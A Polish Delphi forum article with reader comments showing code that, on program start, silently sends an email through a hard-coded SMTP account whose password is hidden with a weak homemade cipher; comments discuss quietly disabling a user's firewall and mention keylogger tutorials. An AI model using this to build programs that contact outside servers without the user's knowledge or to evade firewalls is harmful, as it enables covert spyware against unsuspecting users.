Wysyłanie maila bez wiedzy użytkownika

InterAktywny

Komentarz chyba zbędny :) Po prostu chodzi o wysłanie maila i zabezpieczenie hasła do serwera, który posłużył nam do wysłania listu.

unit Unit1;
interface
uses
 Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
 Dialogs, IdMessage, IdBaseComponent, IdComponent, IdTCPConnection,
 IdTCPClient, IdMessageClient, IdSMTP, StdCtrls;

type
 TForm1 = class(TForm)
  IdSMTP1: TIdSMTP;
  IdMessage1: TIdMessage;
  Label1: TLabel;
  procedure FormCreate(Sender: TObject);
 private
  FUNCTION OdSzyfruj(Tekst,Haslo:String):String;
 public
  { Public declarations }
 end;

 TWyslijMail = class(TThread)
  Private
   Status :BOOLEAN;
  Protected
  PROCEDURE Execute; override;
 end;

var
 Form1   :TForm1;
 WyslijMail :TWyslijMail;
implementation {$R *.dfm}

{Wątek wysyłający maila}
PROCEDURE TWyslijMail.Execute;
var
 x :Integer;
Begin
 FreeOnTerminate:= True; //zakończ wątek po wykonaniu tej procedury
 x:= 0;
 with Form1 do
 begin
  //podanie parametrów do message...
  IdMessage1.From.Address:= '[email protected]'; //nadawca Twój mail
  IdMessage1.Recipients.EMailAddresses:= '[email protected]'; //odbiorca
  IdMessage1.From.name:= 'od Franka'; //imię nadawcy
  IdMessage1.Subject:= 'pozdrowionka'; //temat
  IdMessage1.Body.Append('to jest tekst maila'); //treść
  //parametry logowania na Twój serwer SMTP...
  IdSMTP1.Host:= 'poczta.o2.pl';
  IdSMTP1.Username:= 'nadawca';
  //do zaszyfrowania nazwy hasła np: "ufoludek" uzyto nazwy komponentu Form1
  IdSMTP1.Password:= OdSzyfruj('?ź ťť','Form1');
  IdSMTP1.AuthenticationType:= atLogin; //włączona opcja uwierzytelniania
  //ŁĄCZENIE... (3 razy w razie wystąpienia błędu)
  REPEAT
   Inc(x);
   Try
    //połaczenie i wysłanie...
    label1.Caption:= 'łączenie...'; //tylko dla podglądu
    Application.ProcessMessages;
    IdSMTP1.Connect;
    label1.Caption:= 'wysyłanie...'; //tylko dla podglądu
    IdSMTP1.Send(IdMessage1);
    label1.Caption:= 'mail został wysłany'; //tylko dla podglądu
    Status:= True;
    {jeśli dasz finally to przy błedzie bedzie właściwa uwaga - ale skoro
    user ma niewiedzieć o wysyłce maila to musi być jak ponizej}
   except
    Status:= False;
    label1.Caption:= 'Błąd !'; //tylko dla podglądu
    if IdSMTP1.Connected then IdSMTP1.Disconnect;
   end;
  UNTIL (Status = True) or (x = 3);
  if IdSMTP1.Connected then IdSMTP1.Disconnect;
 End;
 {if status then ... tu mozna dać wpis do rejestru ze został wysłany
 a przy następnym uruchomieniu programu pobierać ten wpis}
End;

{Odszyfrowuje zaszyfrowany tekst }
FUNCTION TForm1.OdSzyfruj(Tekst,Haslo:String):String;
var
 x,y   :Integer;
 lp,cyfra :Integer;
 a    :String;
Begin
 Haslo:= LowerCase(Haslo);           //zamiana liter z dużych na małe
 for lp:=1 to Length(Haslo) do
 begin
  cyfra:= Ord(Haslo[lp])*lp;
  a:= a+IntToStr(cyfra);
 end;
 Haslo:= a;
 Result:= Tekst; //przypisuje do funkcji wartość zmiennej "Tekst"
 y:=0;      //zeruje licznik ilości znaków w haśle
 //wykonuje kolejno litera po literze...
 for x:=1 to Length(Tekst) do
 begin
  Inc(y);   //zwiększa licznik o kolejną literę hasła
  if y>Length(Haslo) then y:= 1; //jeżeli licznik przekroczy długość hasła
  Result[x]:=Char( Ord(Tekst[x]) - Ord(Haslo[y]) - 255 );
 end;
End;

//============================================
procedure TForm1.FormCreate(Sender: TObject);
begin
 {tu można sprawdzić w rejestrze czy był wcześniej wysłany mail}
 WyslijMail:= TWyslijMail.Create(FALSE);
end;

END.

{TO UMIEŚCIĆ W INNYM PROGRAMIE I ZASZYFROWAĆ SOBIE HASŁO KTÓRENALEŻY WSTAWIĆ DO KODU PROGRAMU WYSYŁAJĄCEGO MAIL}

FUNCTION TForm1.Szyfruj(tekst,haslo:String):String;
var
x,y   :Integer;
lp,cyfra :Integer;
a    :String;
Begin
 haslo:= LowerCase(haslo); //zamiana liter z dużych na małe
 for lp:= 1 to Length(haslo) do
 begin
  cyfra:= Ord(haslo[lp])*lp;
  a:= a+IntToStr(cyfra);
 end;
 haslo:= a;
 Result:= tekst;  //przypisuje do funkcji wartość zmiennej "tekst"
 y:=0;      //zeruje licznik ilości znaków w haśle
 //wykonuje kolejno litera po literze...
 for x:= 1 to Length(tekst) do
 begin
  Inc(y);    //zwiększa licznik o kolejną literę hasła
  if y>Length(haslo) then y:= 1; //jeżeli licznik przekroczy dlugość hasła
  Result[x]:=Char( Ord(tekst[x]) + Ord(haslo[y]) + 255 );
  //jeżeli wystąpi błąd kodowania to...
  if Result[x]= '' then
  begin
   ShowMessage('Użyto niedozwolonego znaku: '+ Char(Ord(haslo[y])) );
   Result:= tekst;
   Exit;
  end;
 end;
End; 

procedure TForm1.Button1Click(Sender: TObject);
var
 hasloSerwera , haslo :String;
begin
 hasloSerwera:= 'ufoludek'; //hasło na które logujesz się na pocztę
 haslo:= Form1.Name;    //do zahasłowania np. nazwa formy
 Edit1.Text:= Szyfruj(hasloSerwera,haslo);
end;

7 komentarzy

Chyba, że użytkownik na firewalla - wtedy z wysyłania bez wiedzy użytkownika nici :)

Darowalbym sobie pisanie takich \"zabezpieczen\", ich temat byl walkowany tyle razy, ze cos takiego jak to nie powinno ujrzec swiatla dziennego.

Na firewalla tez jest sposób - w sieci jest kod żródłowy firewalla napisanego w Delphi.
Wystarczy <ort>wziąść</ort> kawałek z ze wskazaniem otwartego portu i nazwą aplikacji ... i w tym momencie zostaje zablokowany firewall usera.
Zero komunikatów - sam sprawdzałem.
Po wysłaniu maila kolejną instrukcją z tego kodu, wyłaczyć naszego firealla. I przywrócone zostanie działanie firewalla usera.
Zresztą kombinacji jest dużo.
A to umieściłem tu bo gdzie miałem umieścić ? w poście ?

user to podaj ten kawałek blokujący firewalla bo jakoś ci nie wierze albo daj chociaż link... albo wyślij mi na maila [email protected] byłbym zainteresowany

Co jest ze mi wyswietla błąd w
FUNCTION TForm1.Szyfruj(tekst,haslo:String):String;

a dokladniej na słowie Szyfruje :( ??
moze ktos pomoze ?

[email protected]

A nie mógłbyś podać mniej zwięzłego sposobu na wysłanie e-maila?
Gdzieś w sieci był tutorial "Jak napisać keyloggera' i tam była tylko jedna czy dwie procedury z 5-3 linijkami tekstu.
I jakby ktoś mógł, nich da linki do komponentów.
Z gory dzięki!

Proszę masz linka ..podaje Ci go tylko dla wiarygodności:
http://winsockfirewall.sourceforge.net
A to jaką trzeba procedurę <ort>wziąść</ort>, co zmienić, co dodać ? - to oblukaj sobie sam. Może tytuł tego arta jest idiotyczny , ponieważ mi chodziło o sposób wysłania maila, a nie o samo ukrycie tego faktu przed użytkownikiem :P Wyszło jak wyszło. Art był odpowiedzią na post innego kolegi. Akurat poruszony był problem szyfrowania. Więc dodałem to do arta. I wcale tu nie chodzi by był to jakiś trojan czy inne świństwo. Więc temat firewalla zamykam :]